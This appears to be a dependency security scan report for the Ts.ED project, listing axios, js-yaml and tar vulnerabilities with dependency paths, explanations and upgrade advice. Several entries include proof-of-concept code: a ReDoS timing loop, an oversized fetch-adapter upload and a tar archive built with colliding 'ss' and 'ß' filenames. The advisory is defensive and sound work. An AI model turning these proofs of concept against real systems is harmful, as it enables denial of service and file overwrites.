Upgrade @octokit/request-error to version 5.1.1, 6.1.7 or higher.

References

medium severity
new

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: axios
  • Introduced through: axios@1.15.2

Detailed paths

  • Introduced through: @tsed/root@TypedProject/tsed axios@1.15.2
    Remediation: Upgrade to axios@1.16.0.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the fetch adapter when finite size limits are configured but not enforced. An attacker can exhaust server resources by sending or receiving oversized request or response bodies, such as through large data: URLs or attacker-controlled uploads, bypassing the intended boundaries.

Note:

This is only exploitable if the application explicitly configures finite maxContentLength or maxBodyLength limits and relies on the fetch adapter to enforce them.

Workaround

This vulnerability can be mitigated by using the Node.js http adapter for server-side requests, validating or capping attacker-controlled request bodies before passing them to the library, and strictly allowlisting or rejecting attacker-controlled URL schemes, especially data: URLs, before making requests.

PoC

import http from 'node:http';
import axios from 'axios';

const server = http.createServer((req, res) => {
  let received = 0;

  req.on('data', chunk => {
    received += chunk.length;
  });

  req.on('end', () => {
    res.end(JSON.stringify({ received }));
  });
});

await new Promise(resolve => server.listen(0, resolve));
const url = `http://127.0.0.1:${server.address().port}/`;

await axios.post(url, 'A'.repeat(2 * 1024 * 1024), {
  adapter: 'fetch',
  maxBodyLength: 1024
});

// Vulnerable versions succeed and the server receives 2097152 bytes.
// Fixed versions reject with ERR_BAD_REQUEST.

server.close();

Remediation

Upgrade axios to version 1.16.0 or higher.

References

medium severity
new

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: axios
  • Introduced through: axios@1.15.2

Detailed paths

  • Introduced through: @tsed/root@TypedProject/tsed axios@1.15.2
    Remediation: Upgrade to axios@1.16.0.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) in the read function when attacker-controlled input is used as the cookie name parameter, which is interpolated into a regular expression without proper escaping. An attacker can cause excessive CPU consumption and freeze the browser tab by supplying specially crafted input that triggers catastrophic backtracking in the regex engine.

Note:

This is only exploitable if attacker-controlled data can reach the XSRF cookie name configuration or a direct/unsafe call to the internal cookie helper.

Workaround

This vulnerability can be mitigated by setting the XSRF cookie name configuration to null if XSRF protection is not required, avoiding the use of attacker-controlled input for the cookie name, and validating cookie names against a strict allowlist before passing them to the relevant function.

PoC

function vulnerableRead(name, cookie) {
  const start = Date.now();

  try {
    cookie.match(new RegExp('(?:^|; )' + name + '=([^;]*)'));
  } catch {}

  return Date.now() - start;
}

for (const n of [20, 22, 24, 26, 28]) {
  const cookie = 'x='.padEnd(n, 'a') + '!';
  console.log(`${n}: ${vulnerableRead('(.+)+$', cookie)}ms`);
}

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade axios to version 0.32.0, 1.16.0 or higher.

References

medium severity

Prototype Pollution

  • Vulnerable module: js-yaml
  • Introduced through: lerna@8.1.8

Detailed paths

  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 js-yaml@4.1.0
    Remediation: Upgrade to lerna@9.0.3.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 js-yaml@4.1.0
    Remediation: Upgrade to lerna@9.0.3.

Overview

js-yaml is a human-friendly data serialization language.

Affected versions of this package are vulnerable to Prototype Pollution via the merge function. An attacker can alter object prototypes by supplying specially crafted YAML documents containing __proto__ properties. This can lead to unexpected behavior or security issues in applications that process untrusted YAML input.

Workaround

This vulnerability can be mitigated by running the server with node --disable-proto=delete or by using Deno, which has pollution protection enabled by default.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade js-yaml to version 3.14.2, 4.1.1 or higher.

References

medium severity

Improper Handling of Unicode Encoding

  • Vulnerable module: tar
  • Introduced through: lerna@8.1.8

Detailed paths

  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.4.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.4.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 libnpmpublish@9.0.9 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 libnpmaccess@8.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 libnpmpublish@9.0.9 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 libnpmpublish@9.0.9 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 libnpmpublish@9.0.9 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 libnpmpublish@9.0.9 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 libnpmpublish@9.0.9 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Improper Handling of Unicode Encoding in Path Reservations via Unicode Sharp-S (ß) Collisions on macOS APFS. An attacker can overwrite arbitrary files by exploiting Unicode normalization collisions in filenames within a malicious tar archive on case-insensitive or normalization-insensitive filesystems.

Note:

This is only exploitable if the system is running on a filesystem such as macOS APFS or HFS+ that ignores Unicode normalization.

Workaround

This vulnerability can be mitigated by filtering out all SymbolicLink entries when extracting tarball data.

PoC

const tar = require('tar');
const fs = require('fs');
const path = require('path');
const { PassThrough } = require('stream');

const exploitDir = path.resolve('race_exploit_dir');
if (fs.existsSync(exploitDir)) fs.rmSync(exploitDir, { recursive: true, force: true });
fs.mkdirSync(exploitDir);

console.log('[*] Testing...');
console.log(`[*] Extraction target: ${exploitDir}`);

// Construct stream
const stream = new PassThrough();

const contentA = 'A'.repeat(1000);
const contentB = 'B'.repeat(1000);

// Key 1: "f_ss"
const header1 = new tar.Header({
    path: 'collision_ss',
    mode: 0o644,
    size: contentA.length,
});
header1.encode();

// Key 2: "f_ß"
const header2 = new tar.Header({
    path: 'collision_ß',
    mode: 0o644,
    size: contentB.length,
});
header2.encode();

// Write to stream
stream.write(header1.block);
stream.write(contentA);
stream.write(Buffer.alloc(512 - (contentA.length % 512))); // Padding

stream.write(header2.block);
stream.write(contentB);
stream.write(Buffer.alloc(512 - (contentB.length % 512))); // Padding

// End
stream.write(Buffer.alloc(1024));
stream.end();

// Extract
const extract = new tar.Unpack({
    cwd: exploitDir,
    // Ensure jobs is high enough to allow parallel processing if locks fail
    jobs: 8 
});

stream.pipe(extract);

extract.on('end', () => {
    console.log('[*] Extraction complete');

    // Check what exists
    const files = fs.readdirSync(exploitDir);
    console.log('[*] Files in exploit dir:', files);
    files.forEach(f => {
        const p = path.join(exploitDir, f);
        const stat = fs.statSync(p);
        const content = fs.readFileSync(p, 'utf8');
        console.log(`File: ${f}, Inode: ${stat.ino}, Content: ${content.substring(0, 10)}... (Length: ${content.length})`);
    });

    if (files.length === 1 || (files.length === 2 && fs.statSync(path.join(exploitDir, files[0])).ino === fs.statSync(path.join(exploitDir, files[1])).ino)) {
        console.log('\[*] GOOD');
    } else {
        console.log('[-] No collision');
    }
});

Remediation

Upgrade tar to version 7.5.4 or higher.

References

medium severity
new

Prototype Pollution

  • Vulnerable module: axios
  • Introduced through: axios@1.15.2

Detailed paths

  • Introduced through: @tsed/root@TypedProject/tsed axios@1.15.2
    Remediation: Upgrade to axios@1.16.0.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Prototype Pollution via polluted Object.prototype properties in the merge process. An attacker can inject arbitrary HTTP headers into outbound requests or cause synchronous application crashes by manipulating upstream dependencies to pollute prototype attributes, leading to header injection or denial of service conditions.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

